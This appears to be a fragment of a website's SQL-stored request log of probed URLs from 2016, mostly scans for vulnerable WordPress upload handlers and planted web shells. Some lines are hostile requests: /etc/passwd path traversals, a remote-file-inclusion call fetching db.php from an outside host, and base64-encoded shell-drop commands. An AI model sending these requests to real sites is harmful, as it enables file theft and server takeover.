(0xc6e13a228057d9114cd67a860e8f201a, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php'),
(0xc99b4d055df667b8441daeb161a33caa, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php'),
(0xe935586cf5b54f35540711b2102980c9, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php'),
(0x309a1072bc56a33a6eb11144db8e9c2e, 1468441531, '/assets/js/uploadify/uploadify.php'),
(0x4136639491a3000aa4ae4442e3a94d99, 1468447608, '/wp-content/plugins/front-end-upload/lib/plupload/js/plupload.js'),
(0xe21ffa883cdf96f0f7745b749189346b, 1468448808, '/sql.php?n703018'),
(0x87da02982c8e53ce5172546628c91d09, 1468448808, '/session.php?n79c1ec'),
(0x560128ee4e2dc48ef1e75ea266923e31, 1468448808, '/functions.php?q78cd5a'),
(0xd2269f4599faab08710ea4206d38bfe9, 1468448808, '/utf.php?qe91e7a'),
(0x92c303ee682804dfd7cb277b01bd70ad, 1468448808, '/blog.php?n7f69dd'),
(0x340150727369376fd36ae2e3daf78e0c, 1468448808, '/option.php?ncdd94a'),
(0x3a569cb523d8e272d47ee529ea8faef4, 1468448808, '/files.php?n23f412'),
(0x9fba6e9cc3abc6e19514037b2bc0e930, 1468448809, '/view.php?qbc8a20'),
(0x9b30ed5a8e47ac05661550482e2180c9, 1468448809, '/diff.php?qf76775'),
(0xb336ef911b7f5c8a6f16cc2384c89af4, 1468448809, '/code.php?nd6e706'),
(0x0e4a675ddf2df28b3c856928d7ad9637, 1468448809, '/article.php?n0e7f9c'),
(0xe321cdc3d068437c7415c8a18fe51377, 1468448809, '/db.php?q95e668'),
(0x8a7a724106a786e77ffc8803854e2bd9, 1468448809, '/title.php?q6fc9cb'),
(0x91791dee426ef1c9244be47c0b23c885, 1468448809, '/ajax.php?nf03c87'),
(0x16cebaa8a05cc6851633eecd2c82e1c7, 1468448810, '/inc.php?q318a65'),
(0x4fe0e86af616e9eb49ad35f0dc7c9700, 1468448811, '/model.php?q726b60'),
(0xb59cdf1d72125862c3746b5d9e05914e, 1468448811, '/header.php?q1c1ae6'),
(0x924a83a149fd297bde90f2b262bf57fa, 1468448811, '/xml.php?q3729f7'),
(0xfe4494f62cf2a9ba2c60bdc16d18a7ba, 1468448811, '/footer.php?q44390c'),
(0x8c251a6562355f305bc9a9c0cc5a565b, 1468448811, '/option.php?qcdd94a'),
(0x48598114bb633c10b8d911c323556f0a, 1468448812, '/press.php?q33beb2'),
(0xaaff352c0abb389c1bbff489fbc1c962, 1468448812, '/system.php?q53b3a6'),
(0xb1286abe47291c2a6d121250f9ecc4d8, 1468448812, '/system.php?n53b3a6'),
(0x59c6bb4ef0507ee4141508a342097f3c, 1468448812, '/press.php?n33beb2'),
(0xbc5f4c4e23e99959dd059846a98e79a9, 1468448813, '/error.php?q503876'),
(0xb42fc6592828310a355c59e3e03f38e1, 1468448813, '/template.php?q13e558'),
(0xbf56c7ff48d977682966693affdd6dbe, 1468448813, '/cache.php?qaea521'),
(0xcb081898359ce198c9b8dd6b1d296999, 1468448814, '/template.php?n13e558'),
(0x404bb7b5cae46180fc1cb60008efc1f6, 1468448814, '/dump.php?q59a097'),
(0x087bcad1a21450d6e793399babc5b183, 1468448815, '/include.php?q872b97'),
(0x540510e66766bb7139b1c80afe8540c4, 1468448815, '/files.php?q23f412'),
(0x27f08185320d0dd5414267470a36559e, 1468448816, '/cache.php?naea521'),
(0x2d5d282295321c1376384a4d47a2158f, 1468448817, '/menu.php?ndfbe75'),
(0x2dc7a4380f87d7333955f750a7249717, 1468448817, '/global.php?n89024b'),
(0xd3b1c83780825ade982e79b695bcefe9, 1468448818, '/plugin.php?q55d3bf'),
(0x357f7c382837e8484c09fbf1f1ff986c, 1468448818, '/lib.php?q828043'),
(0xe36d9a6646de0067099e985af53ae8c9, 1468448818, '/blog.php?q7f69dd'),
(0x4555af65d3829bd9835fb2379672eecf, 1468448818, '/inc.php?n318a65'),
(0xf500051e525123691dd965fa1fc72fb4, 1468448818, '/themes.php?nf385ab'),
(0xfb95421dc7d84e70697905534fe31b37, 1468448818, '/defines.php?qa04af1'),
(0x7d9715c597ebbc755722e61b4d2c7058, 1468448818, '/javascript.php?q642afe'),
(0xeb368d2247d716288770585cc98ddde3, 1468448818, '/model.php?n726b60'),
(0x36cc57323808265e61163298808b6577, 1468448819, '/page.php?nf0b08a'),
(0xc5cab266644f347250ac5dd08d1197f2, 1468448820, '/start.php?q7f2521'),
(0x79ed21926a9ca06a6ead2c575dfad24b, 1468448821, '/dump.php?n59a097'),
(0x213fa6b04fa86efbda2aa13e125d3324, 1468448821, '/sql.php?q703018'),
(0x4b601beb3578929c9fb3ad23921fa036, 1468448821, '/stats.php?qf73356'),
(0x5d5bb38d597559aee048ae2257365170, 1468448822, '/lib.php?n828043'),
(0x39cc47a39752deb7beae77f4267a35f9, 1468448823, '/css.php?nd335c3'),
(0x1180d6ffa47bdda74f2f97e78534b853, 1468448823, '/plugin.php?n55d3bf'),
(0x1f1292aa0bf959990f16922fd78ef9c3, 1468448823, '/error.php?n503876'),
(0xa3cc60b929069044fc05fc67c86bb3a4, 1468448824, '/css.php?qd335c3'),
(0x9bd627a1b1f234d32e8b322e3db3cadb, 1468448824, '/db.php?n95e668'),
(0x40f40f7fd42a1ff812dd6e01c4710f78, 1468448824, '/dirs.php?n071238'),
(0x318a1e2e7eba35ba0e0c2bd62f6be8e3, 1468448824, '/user.php?n42dabb'),
(0x74d1374d96c8e77c32337785d9728370, 1468448824, '/session.php?q79c1ec'),
(0xb0d043cfabf8a67f63a6e68850e4bb82, 1468448824, '/header.php?n1c1ae6'),
(0x35cfd74dadcc777b47d5dac97d489da2, 1468448825, '/menu.php?qdfbe75'),
(0x68ab65101a8ca4bd90ef190be5cf1450, 1468448825, '/functions.php?n78cd5a'),
(0x08f01d2a2ef9fb7e5931386998f721fa, 1468448825, '/utf.php?ne91e7a'),
(0xd8976e6b4f95d3fa3ab51a31d3e4ab1b, 1468448826, '/global.php?q89024b'),
(0x90a0a2d320f950aa69afc8760b3a8f60, 1468448826, '/defines.php?na04af1'),
(0xa527617f33f4e4c4180f66d9671b97b6, 1468448827, '/include.php?n872b97'),
(0x1105119eabba5e6810caadb27dd7a899, 1468448827, '/footer.php?n44390c'),
(0x710def34f9045bd5f60e6c39102eca87, 1468448827, '/ini.php?n760097'),
(0xc984656f1b9990fb44a0905bd403c9c5, 1468448827, '/page.php?qf0b08a'),
(0x96e35545dbe6d1994a0dcad57f2ac728, 1468448827, '/ini.php?q760097'),
(0x3a580c109dc7ee55106636f8cdb33f0c, 1468448828, '/javascript.php?n642afe'),
(0xe58a6aaa692ddd34cdcc47e5acad6224, 1468448828, '/user.php?q42dabb'),
(0x7310a7cbb2fe0ed1d2082974a848c3a3, 1468448828, '/dirs.php?q071238'),
(0x5c075a95340bb590c8e2d580643467ac, 1468448828, '/ajax.php?qf03c87'),
(0x8d65f51972ac27e99d1a253563333134, 1468448828, '/start.php?n7f2521'),
(0xd2c9a40a9afb6e5984f1d641b5e933db, 1468448829, '/title.php?n6fc9cb'),
(0x6fa0deee93445056bff0eb883004a0a1, 1468448829, '/article.php?q0e7f9c'),
(0xa86ed3cd69646b9bca23cc7b0e256489, 1468448829, '/themes.php?qf385ab'),
(0xab39b88559b3f84ca89adec0b7e62088, 1468448829, '/diff.php?nf76775'),
(0xff63f9aac2ffd10a93cc6857e3c35728, 1468448829, '/stats.php?nf73356'),
(0x3c3cee187bd83de1c072862f0d84be71, 1468449047, '/view.php?nbc8a20'),
(0x76c04a82901b0d78411b6e344e6e4465, 1468449620, '/code.php?qd6e706'),
(0x45798bf58c748ed40be8f6f34e96f9c3, 1468455627, '/xml.php?n3729f7'),
(0x32e601a8b5b372202772eebf4cbe8bc0, 1468458292, '/wp-content/themes/highlight/style.css'),
(0x46485889a67dcff89cde54254b2c43c8, 1468483704, '/wp-content/plugins/php-event-calendar/server/file-uploader/'),
(0x590ea95205c53458c1ae142d4b1c2bc8, 1468519178, '/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php'),
(0x373a8bcd3142b6e23c7e8c4f5b641fc5, 1468543136, '/wp-content/plugins/complete-gallery-manager/frames/upload-images.php'),
(0x654bae92fc71da1b134ab708155cb105, 1468590539, '/wp-content/uploads/wpcf7_captcha/758895385.png'),
(0xd0b89b171118e0d957e0c7ee9875c832, 1468605750, '/wp-content/themes/rayoflight/functions/upload-handler.php'),
(0x94cda96335d2841954e8b14bd3858bc5, 1468617441, '/wp-content/themes/highlight/lib/utils/upload-handler.php'),
(0x524ec9caf1b8fce8e4c6d4b171b8a9c1, 1468625549, '/wp-content/plugins/sexy-contact-form/includes/js/eye.js'),
(0xecfdcf88ba850e4beec422ee1789db85, 1468649538, '/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php'),
(0x1dce27e40a6ad66762cb869f8deedc77, 1468680350, '/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php'),
(0x41464468178d70b9254b5d84d10c8863, 1468681755, '/license.php'),
(0x8eba496fd7b9e68cb4fe61269590f64c, 1468692610, '/wp-content/plugins/form-lightbox/colorbox/style-1/colorbox.css'),
(0xc8692a0c057c1ae621e2702cad6a7984, 1468702951, '/wp-content/uploads/wp-cache.php'),
(0xe75921820c84c3af5ab356b873b11593, 1468702952, '/wp-cache.php'),
(0x52b20339eab3e6807e9cf6a24a36d3e5, 1468702954, '/wp-content/plugins/revslider/temp/update_extract/wp-cache.php'),
(0xf4acd4fa8acb4dd0b0eba8e15dcbb175, 1468702954, '/uploadify/uploadify.php?folder=/'),
(0xb8be69e7712637489a73f4c933fb7663, 1468702955, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=d3AtY2FjaGUucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x95da9af9c0868bbfb07522758e736279, 1468702956, '/wp-content/plugins/wp-cache.php'),
(0x88af968f9c93d6dd0bbdf6bb465bb10c, 1468702957, '/sites/all/libraries/elfinder/php/connector.minimal.php'),
(0xb0494ab4488b7e6ae54f366c48249726, 1468702957, '/sites/all/libraries/elfinder/files/wp-cache.php'),
(0x3aa4f062d80573fc154bb6ff023da917, 1468703709, '/wp-content/themes/TheGoodNewsWP105/style.css'),
(0xc939a0d382ac40f5c6464ec9da7df6fd, 1468792737, '/wp-content/plugins/mailcwp/js/mailcwp.js'),
(0xd7bf7ba73ba3e90c11be89f86644bc66, 1468795597, '/wp-content/themes/switchblade-v1.3/framework/_scripts/valums_uploader/php.php'),
(0x4d09080c83fd02c911e5002a5c4540fe, 1468872067, '/wp-content/plugins/html5avmanager/lib/uploadify/custom.php'),
(0x58d26ee75c02a4e25878c520ba1441c2, 1468903206, '/wp-content/themes/thecotton_v114/style.css'),
(0x38eb3a537f8ebd55ffc80452314f61b7, 1468933157, '/wp-content/themes/drochilli-child/uploadify/uploadify.php'),
(0x4cbd2e85c18b981383c1843f20142e82, 1468980901, '/wp-content/themes/saico/js/custom.js'),
(0x130c72b8d5f1034a1a3b3ef5d5c3b5fd, 1468986442, '/wp-content/uploads/wpcf7_captcha/1332241042.png'),
(0xba909b44cf9b50134ed01a5f820a730d, 1468986766, '/phpmyadmin/'),
(0xef7933a1e3c944a1177680e360b468f8, 1469001519, '/wp-content/plugins/font-uploader/fontFunctions/fu_script.js'),
(0xd2af202387b55560e8e0301905dda9b3, 1469017695, '/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php'),
(0x25bcde80bd81a124cd01615e9210a5c4, 1469040812, '/wp-includes/js/tinymce/skins/wordpress/images/wp-manage.php'),
(0x21e7d4194aad0cfea60f8e884f044532, 1469107888, '/wp-content/plugins/sfbrowser/css/sfbrowser.css'),
(0x9a8f2d8d90aa8446ebc507cdb556d5c1, 1469119084, '/wp-content/plugins/jquery-html5-file-upload/readme.txt'),
(0xe78144682399e1cefd76495940dc0c36, 1469137610, '/wp-content/themes/deep-blue/css/blog.css'),
(0xdc2facc49fe6a3787fed890f42234738, 1469185666, '/wp-content/themes/purevision/style.css'),
(0x29405866648baae58f0a1f3fb26fade1, 1469206933, '/wp-content/plugins/simple-ads-manager/readme.txt'),
(0x716a36eecbf5b8396017b32cc5d0608d, 1469207160, '/wp-content/plugins/page-flip-image-gallery/upload.php'),
(0x29558efd2e918655e9e0b08efdb6bd37, 1469214619, '/wp-content/themes/deep-blue/megaframe/js/cufon.js'),
(0xbf7b294c2081225488aa3220f2a3fac9, 1469214661, '/wp-content/plugins/flipbook/php.php'),
(0xe6bde8b2016c1e17e89d81b8b6c725e8, 1469247601, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js'),
(0x026ab704e1ec2e79fa8e9a04eb43cae6, 1469247603, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php'),
(0x0c0fea4db5307af731938f2656483e2a, 1469247605, '/wp-content/plugins/revslider/temp/update_extract/revslider/db.php'),
(0xe6ed294949f440c65271d33edae65649, 1469262095, '/wp-content/themes/u-design/style.css'),
(0x48747f698eeebc318a589bb4edd38d2b, 1469275054, '/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php'),
(0xa5b46fbf0c50760fe59d5bfa3e41c881, 1469311083, '/wp-content/themes/sketch/404.php'),
(0x9566e14481598bf9629ce6c59e3a4161, 1469311085, '/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'),
(0x24be9c46357202a06b3a6b4796293b5f, 1469381223, '/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php'),
(0x77db09cd147ea92fab132b86363cd0bf, 1469381224, '/wp-content/themes/felici/sprites/js/uploadify/uploadify.php'),
(0x7ea6805e419f0ec109300b8acc7baf05, 1469409949, '/.git/config'),
(0x2588afa2526d8558d847291e34a862fa, 1469472237, '/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/css/uploadify.css'),
(0xcbb4141f7eee42bbf9a4561e007922af, 1469486666, '/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x99750115a58eb50126d1310860773f71, 1469521773, '/wp-content/uploads/wpcf7_captcha/1305374553.png'),
(0xcba64bc4ef4e1c39eed76318b93e99ea, 1469571848, '/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x681fc7b7413b964023dc367105d91300, 1469579475, '/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css'),
(0x68baf542b74d01ebecbd51f38a7bc6ce, 1469587193, '/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php'),
(0xbf83851226fb4844769a88f40e0aa210, 1469609023, '/wp-content/themes/area53-v1.0.2/framework/_scripts/valums_uploader/php.php'),
(0x682c78a3b0e787f51a4ee605741de527, 1469642509, '/wp-content/themes/konzept/includes/uploadify/upload.php'),
(0x569273bf6e53d346e682ecd188e17b7b, 1469642689, '/wp-content/plugins/omni-secure-files/plupload/examples/upload.php'),
(0x8d099d705a5e6ba729f20229cfb4830a, 1469677155, '/root2.php'),
(0xf80c1c8e852085df59b9eb948345bd9b, 1469677164, '/sic-wp-content/themes/saengerjugend/footer.php'),
(0x55d53b167b0cd4b43245e7aaf3d61e95, 1469677168, '/sonatah.php'),
(0x124b4e7a84988f60633bcec842ad4748, 1469677173, '/stats/setup.php'),
(0x9412494a10e5fcf800ac55358f6f3964, 1469677177, '/support.php'),
(0x79e08e9e31269c9ced8a43426c0306ad, 1469677180, '/symlink_3.php'),
(0x19ac49854471c922cf373baedff42348, 1469677184, '/sys/Sym.php'),
(0x9467f505aea34442882f853e98b90c91, 1469677188, '/tmp/setup.php'),
(0x1876b4571ff4b210548f004205049227, 1469677190, '/update/123wso123.php'),
(0x11014016e14ab908b42753ae0816e2a1, 1469706429, '/wp-content/uploads/wpcf7_captcha/183281058.png'),
(0x8c9675b6b677dd1a20dcca4373cc89c1, 1469707360, '/.git/'),
(0xd2eb95f6f2d63ad835daf7ec95d5c1e6, 1469719080, '/wp-content/plugins/mac-dock-gallery/css/style.css'),
(0x5ba6548407214e167e22f1c06153640e, 1469726314, '/tmp/sfx.php'),
(0xe6dcff00a7bcd01d34cc35a81e403fcf, 1469730776, '/wp-content/plugins/ecstatic/readme.txt'),
(0x0038c292d9e6b4f357f68b96073de971, 1469730781, '/wp-content/themes/konzept/style.css'),
(0x7e09162f28faa4f7ab5bdd6e8c676ebf, 1469773241, '/wp-content/uploads/BirdsRio.php'),
(0xa06031792f88f364de99070910fadf03, 1469773242, '/BirdsRio.php'),
(0xef3617568355e22e5edcc5c7983ddddc, 1469773244, '/wp-content/plugins/revslider/temp/update_extract/BirdsRio.php'),
(0xe1f00da5c8c9382f2e0ebb7abf6dcc54, 1469773245, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=QmlyZHNSaW8ucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x39d9624126de47ba8ccb9bcec315fbbd, 1469773246, '/wp-content/plugins/BirdsRio.php'),
(0xfb6785119e44cf9826186d687f266c80, 1469825318, '/wp-content/plugins/content-flow3d/shortcode/upload.php'),
(0x6ab225012fe50c291011733d3946471f, 1469866693, '/wp-content/themes/ut-strange/addpress/css/style.css'),
(0xc1c001b3824c973473bebcf79c55b861, 1469909738, '/wp-content/plugins/picturesurf-gallery/upload.php'),
(0x4e90bbf06bf426e287d0dfa64f069dcf, 1469963065, '/wp-content/plugins/wp-easy-gallery-pro/admin/php.php'),
(0x42f4c2bdd88e02fffa1b957547dae586, 1469968702, '/browserconfig.xml'),
(0x3dd7c3ca29db107055a8b56caa7e68f8, 1469978619, '/wp-content/plugins/rbxgallery/js/script.js'),
(0xdc28a8d8eed6c077a8c41a66ed71b366, 1469997277, '/wp-content/themes/lightspeed/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x7b95ef608609b3824e0c17dd13084cdc, 1470061687, '/wp-content/plugins/wpmarketplace/uploadify/swfobject.js'),
(0xa11e9e37b0161606cd5d3e5c26706d55, 1470063589, '/?author=4'),
(0x0d91205a6058c06c282cf11df8055cf4, 1470072951, '/wp-content/themes/nuance-v1.2.4/functions/jwpanel/scripts/valums_uploader/php.php'),
(0x997da286bc2da09061e772b73a459136, 1470080451, '/wp-content/plugins/wp-mobile-detector/themes/anakin-mobile/style.css'),
(0x84c09ef767fc6be9cbb9b9de00a928a9, 1470141626, '/les-seances-namur/ca'),
(0x77b78df7ced5488c9c58a8393b9ddc68, 1470169712, '/wp-content/plugins/nmedia-user-file-uploader/doupload.php'),
(0xc5481c7c50d91354938ecb6a3f468c7e, 1470189846, '/wp-content/themes/Famous/style.css'),
(0xe8f5d7cf13e0ecefe7aa95ebee5bae1d, 1470237568, '/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php'),
(0x931330a655f23ca0bfef10d7e220b568, 1470246114, '/wp-content/plugins/accordion/js/swfupload/js/upload.php'),
(0x2ee3316697cccc66f88e751902045c11, 1470298441, '/wp-content/plugins/fluid_forms/file-upload/css/style.css'),
(0xf949786e647380a3f395317fdd6bf080, 1470316758, '/wp-posts.php'),
(0x4b3af16bd714fac0124bd07e64d8d55b, 1470320685, '/fckeditor/editor/'),
(0x6b7d985df8cd2ba9f199f8c32b57549a, 1470325902, '/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php'),
(0x28657a768e5d2f078b1c33be5d017462, 1470353071, '/wp-content/plugins/revslider/js/admin.js'),
(0x2831e6becd06817d7d095f1b60975446, 1470382399, '/fuckyeh'),
(0x5ac693650447718d04091523bccbbdab, 1470382571, '/wp-content/plugins/hungred-post-thumbnail/js/hpt_ini.js'),
(0xefdad48cd69a87aea5794916905cd600, 1470390605, '/wp-content/plugins/wp-front-end-repository/readme.txt'),
(0x52de360e5c28f6d3936173372b613eba, 1470439928, '/wp-content/plugins/nmedia-user-file-uploader-pro-v7.3/js/ajax.js'),
(0xea7ded126b6c344d3a9a7f71a7121ee4, 1470444542, '/wp-content/themes/deep-blue/style.css'),
(0xe26737a8dc093325914e97f0f0026a63, 1470497236, '/wp-content/uploads/wpcf7_captcha/1141445954.png'),
(0xed445d4857e6176ecc55fd88e358fb2a, 1470512628, '/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php'),
(0xbe0acb5f404cc7b902414a34a4948a05, 1470537820, '/update/update/js/js.php'),
(0x717c51838a4762b9719a00912100ba7e, 1470537827, '/validate.php'),
(0xbe60f222921afb0f16ad729d40afa415, 1470537833, '/weight-loss-plans/cache/gif/mssqli.php'),
(0x34c71370c02ee6bde9f595b6233e7d0a, 1470537839, '/wp-admin/class.gd-img.php'),
(0x1a570b9ad0d693ecfbd94467b55acd3c, 1470537845, '/wp-admin/class-adminsbar.php?alien=1'),
(0x60207888ca85ad8310ed387592b36fcb, 1470537852, '/wp-admin/css/c3ll.php'),
(0xced8e613d4c26211e763a16ea85b5593, 1470537859, '/wp-admin/css/class-wp-upgrader.php'),
(0x5bb32abce6a9e38d023b08f8dff763f5, 1470537864, '/wp-admin/css/colors/cache.php'),
(0x4adc7a5f3a583b85579f5b0a6a453b0e, 1470537870, '/wp-admin/css/css.php'),
(0x399364a0fac82f53f0d396fc50931ce2, 1470553447, '/.google-analytics.com/ga.js'),
(0x66a4833f24e4aa738853b1232a0ef02a, 1470554584, '/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js'),
(0x9f45e2cc006dfd4b70e4c7972a1ccaeb, 1470558784, '/wp-content/plugins/front-file-manager/readme.txt'),
(0xa22758d3c5bcde92daa5868bd0801ac8, 1470608700, '/wp-content/uploads/wpcf7_captcha/126895956.png'),
(0xdac8da945093d685684b5352ba2e0a39, 1470627574, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.relationshiptips.club/cache/db.php'),
(0x89b67669b22f291047ade895dd36017d, 1470627579, '/wp-content/plugins/wp-mobile-detector/cache/db.php'),
(0xe40a10fe2bdada5f98d4e75f9f6618d7, 1470627603, '/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd'),
(0xbcbad46be3498cd5fa3a4cecacaaa428, 1470627607, '/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd'),
(0x0c8b4863badef919000f92d198a0b8a0, 1470627608, '/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'),
(0x117ae3eee371a5e12e9f3d6ad04a1af2, 1470627611, '/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'),
(0x3b13f0b7c322768d5ce2c5c409d62513, 1470627615, '/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd'),
(0xa9a8bff15543066db31a48263c0a8948, 1470627627, '/wp-content/plugins/wp-symposium/server/php/WmUVxVcDnjczts.php'),
(0x13beab93b9b8e14d9f2272990df30bd6, 1470641540, '/wp-content/uploads/wpcf7_captcha/1439580919.png'),
(0x1d6c7f13a5fd7c4cacbd01d639bf5f2d, 1470642768, '/wp-content/plugins/wp_optin_pro/autorespond.js'),
(0x3ec135ad8e4a67204f47ac3fe658b5b7, 1470661101, '/wp-content/uploads/wpcf7_captcha/1620112865.png'),
(0xfae354f8873cd7303ee823436e7800be, 1470668020, '/wp-content/uploads/wpfoot.php'),
(0xf497fa496b1a581f29c60bd8482d9c34, 1470668022, '/wpfoot.php'),
(0x48672acd8200beb27411d5d07ec4d92f, 1470668024, '/wp-content/plugins/revslider/temp/update_extract/wpfoot.php'),
(0x7ec73795c95993a8a4680db0492d5cc4, 1470668028, '/tiny_mce/plugins/tinybrowser/upload.php?type=file'),
(0x0f3115a036f1be22dd93ecfdd71189a4, 1470668053, '/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass='),
(0xca417939d1a34ebbdc2c31a981f8e702, 1470668054, '/wpfoot.php.suspected_'),
(0x4f815a145cd45d605b26a1a27cf0de72, 1470668055, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=d3Bmb290LnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x7e69f2baa4200c1836eef1b75d13c16b, 1470668056, '/wp-content/plugins/wpfoot.php'),
(0x7a5eea8d890f13592b14271423934121, 1470668057, '/sites/all/libraries/elfinder/files/wpfoot.php'),
(0xba5eaa28b793d8392cc70ce01e7fe27c, 1470668058, '//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php'),
(0x0b4e5cce4f1361bedbb75274882a3b5d, 1470668060, '/wp-content/uploads/files/guest/wpfoot.php'),
(0xf03cd028e8afbadf9780316fd2fc841a, 1470706658, '/wp-content/themes/kiddo/style.css'),
(0xe47a424603eac6d34e3848e03c65c0dd, 1470729422, '/wp-content/plugins/ecwid-shopping-cart/css/frontend.css'),
(0x326975a007812bd1d1f50efde374f975, 1470744590, '/wp-content/themes/atom/uploadify/uploadify.css'),
(0xfb5f63f40d9ccc338750a4be96ca837b, 1470749887, '/wp-content/uploads/wpcf7_captcha/227190070.png'),
(0xcb1315dc2fd97fc3a6af8d88400a578d, 1470763858, '/wp-content/themes/holding_pattern/admin/css/up_framework.css'),
(0x197f8bbc4fdb4ff4cf440c689cffa960, 1470785882, '/js/fckeditor/editor/'),
(0xa0fa2f2552e2537877eb66476ccf73d6, 1470801517, '/wp-content/themes/kiddo-turf-parent/style.css'),
(0x1ef73d34d300bb4188e444c03f079fb9, 1470830404, '/wp-content/plugins/dzs-zoomsounds/admin/upload.php'),
(0x544c112b34806896fb466544fa3e8c1b, 1470855006, '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'),
(0x2debaa3194524e19e232cea0579bd832, 1470885531, '/wp-content/themes/kiddo-turf-child/style.css'),
(0x3b4ff3979d0b312a3ad7ebd01f643afa, 1470917009, '/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css'),
(0x0f274982b238b689d25916b9e99d7446, 1471000515, '/wp-content/plugins/estatik/readme.txt'),
(0xf8030c2ac9b16cd5c744ee6b3555d823, 1471063326, '/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php'),
(0x8e82769bdd16c282afe0eba2b6b57447, 1471093144, '/wp-content/plugins/wp-vertical-gallery/readme.txt'),
(0x2d59582ea51d7b1b3ae8a943acb88aad, 1471103915, '/wp-content/plugins/wpmarketplace/readme.txt'),
(0x571f5f2de64b1eb3998148e9d0af8c88, 1471106788, '/js/mage/cookies.js'),
(0x0f47ebc056060cc5bd73164ff99bdac0, 1471237237, '/wp-content/uploads/wpallimport/uploads/863ca013b605eae7441b8d7b50c5de0b/db.php'),
(0xecc5150124f28808868eba2c909dede9, 1471285279, '/wp-content/plugins/pitchprint/uploader/'),
(0xb358a4142241209cc064b30e2213e0fe, 1471337911, '/admin/fckeditor/editor/'),
(0x9e1dfb4c2913251f30c3803aa44678d6, 1471349660, '/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php'),
(0xc33ecd8b968ed4fb5cc5e0d1104bfdb0, 1471356840, '/wp-content/themes/pinboard/themify/css/colorpicker.css'),
(0x0be1d605e9c480e3971cd37409136d42, 1471386430, '/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/js/markermanager.js'),
(0x42c2b080769672023cde10a2e5f1fcb7, 1471411921, '/wqeqeq'),
(0x06c5a75da96f08260d7605252d2ed6a4, 1471419154, '/wp-content/themes/Directory/style.css'),
(0xe37610d84c63d90bb61a8f78587cb4b4, 1471477228, '/wordpress'),
(0x192db5a48ae26c54587128d48fecc891, 1471522667, '/wp-content/plugins/wpe-indoshipping/admin/upload-file.php'),
(0x4fbe56d6a8c73b0b646d1013b4be6185, 1471540893, '/wp-content/themes/gallery/style.css'),
(0xf0ec57496eab0ae97efdf53755b4e903, 1471589359, '/wp-admin/css/export.php'),
(0xaf1abb082cb7c4310f810c684076ef6d, 1471589363, '/wp-admin/css/layour/function.php?Asia%2FJakarta=1'),
(0x8321c423f406528171cbcc9cc34e56c8, 1471589367, '/wp-admin/css/profile.php'),
(0x34b05b86dabffe2a9fa519a6ca33dbda, 1471589370, '/wp-admin/css/themes.php'),
(0x97fd0d1762729b83abd0f5078afbc97c, 1471589372, '/wp-admin/css/upgrade.php'),
(0x9f7b1cb38791b26714cae106463e177d, 1471589375, '/wp-admin/edit-error-tags.php'),
(0x6949fdcc7b233b88f3fda839645d5cb1, 1471589380, '/wp-admin/images/mssqli.php'),
(0x9f5aec0e79ab8722f5f3fde1bf1b0703, 1471589383, '/wp-admin/images/screenshots/olive.php'),
(0x8c8c92d7659c483dd9d87b833769bf2c, 1471589386, '/wp-admin/includes/controller.php'),
(0x6a1147a0b9bfe2ee76e5aa2548b33a9d, 1471609787, '/wp.php'),
(0x5ed8fedac124935b206513955ee97e08, 1471609802, '/wp-includes/login.php?login=cmd'),
(0x5b35fde060633769ff5633060121efc8, 1471609815, '/sitemap.php'),
(0xb0d5c358d8999d8973a357c777d552ff, 1471609832, '/wp-misc.php?t3731n=1'),
(0x364c3f5263aba285d6c8df38a35e7e5d, 1471609848, '/wp-includes/Text/Diff/Engine/authorize.php'),
(0x4d6e55b2f54d711198a224482058350c, 1471609861, '/wp-includes/pomo/sess.php'),
(0xcd6457525a1363fe66e1113c46928a3d, 1471609870, '/wp-includes/sess.php'),
(0x68c75ec1ce63aa87a800dc5b9656ee89, 1471609885, '/get.php'),
(0x81b7504dedb7cd208d67de7c4e6a0fa1, 1471609897, '/wp-includes/pomo/authorize.php'),
(0x314d6a6171247fa56dad117df7a376a7, 1471609905, '/wp-misc.php?t1478n=1'),
(0x1222f1f39657b0a0c81e1e2543157630, 1471609916, '/bookmark.php'),
